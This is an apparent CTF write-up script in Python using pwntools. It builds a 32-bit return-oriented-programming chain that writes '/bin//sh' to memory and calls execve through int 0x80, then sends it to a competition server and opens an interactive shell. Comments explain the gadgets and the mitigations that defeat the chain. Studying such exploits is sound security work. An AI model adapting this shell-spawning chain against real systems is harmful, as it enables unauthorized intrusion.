

```python
# -*-coding:utf-8 -*
from pwn import *

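# Return-oriented-programming (ROP) payload from a CTF write-up. It chains
# short instruction sequences already present in the target binary
# ("gadgets") so that the process ends up issuing execve("/bin//sh", 0, 0)
# through the 32-bit Linux `int 0x80` syscall interface.
#
# Defensive reading: every gadget address and the scratch address below is
# a hard-coded absolute value, so the chain only holds while the binary is
# mapped at a fixed base. A position-independent build under ASLR, a stack
# protector guarding the return address, and bounds-checked input handling
# each break this chain.
#
# Fixes relative to the original listing: the `for` body had lost its
# indentation (the script did not parse), str and bytes were mixed (fails on
# Python 3, where p32() returns bytes), and the connection was bound to the
# name `re`, shadowing the regex module.

# Gadget addresses, with the disassembly given in the original comments.
POP_EDX = 0x0807338a          # pop edx ; ret
POP_EAX = 0x080bc396          # pop eax ; ret
POP_EBX = 0x08058b0f          # pop ebx ; ret
POP_ECX = 0x080e4325          # pop ecx ; ret
MOV_PTR_EDX_EAX = 0x0805512b  # mov dword ptr [edx], eax ; ret
XOR_EAX_EAX = 0x080496b3      # xor eax, eax ; ret
INC_EAX = 0x0807ebcf          # inc eax ; ret
INT_80 = 0x0807398e           # int 0x80

# Address the chain writes the path string to. Which section this falls in
# is not shown on the page; it has to be writable for the chain to work.
SCRATCH = 0x080f0060

# 32 bytes of filler, presumably the distance from the overflowed buffer to
# the saved return address (the vulnerable program is not shown here).
p = b"A" * 32

# Store "/bin//sh" four bytes at a time: edx = destination, eax = data,
# then the mov gadget performs the write.
for offset, chunk in ((0, b"/bin"), (4, b"//sh")):
    p += p32(POP_EDX)
    p += p32(SCRATCH + offset)
    p += p32(POP_EAX)
    p += chunk
    p += p32(MOV_PTR_EDX_EAX)

# Write a zero dword right after the string so it is NUL-terminated.
p += p32(POP_EDX)
p += p32(SCRATCH + 8)
p += p32(XOR_EAX_EAX)
p += p32(MOV_PTR_EDX_EAX)

# Syscall arguments: ebx -> path string, ecx = 0, edx = 0.
p += p32(POP_EBX)
p += p32(SCRATCH)
p += p32(POP_ECX)
p += p32(0x00000000)
p += p32(POP_EDX)
p += p32(0x00000000)

# eax = 11, the execve syscall number on 32-bit Linux: clear it, then
# increment eleven times.
p += p32(XOR_EAX_EAX)
p += p32(INC_EAX) * 11

p += p32(INT_80)

conn = remote("pwn.ctf.tamu.edu", 4325)

# Answers to the program's prompts, sent in the original order. The prompts
# themselves are not shown on the page.
for answer in (b"test", b"test", b"nom", b"y", b"2"):
    conn.send(answer + b"\n")
conn.send(p)
conn.send(b"\n")
conn.interactive()

conn.close()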
#flag = gigem{r37urn_0f_7h3_pwn}

```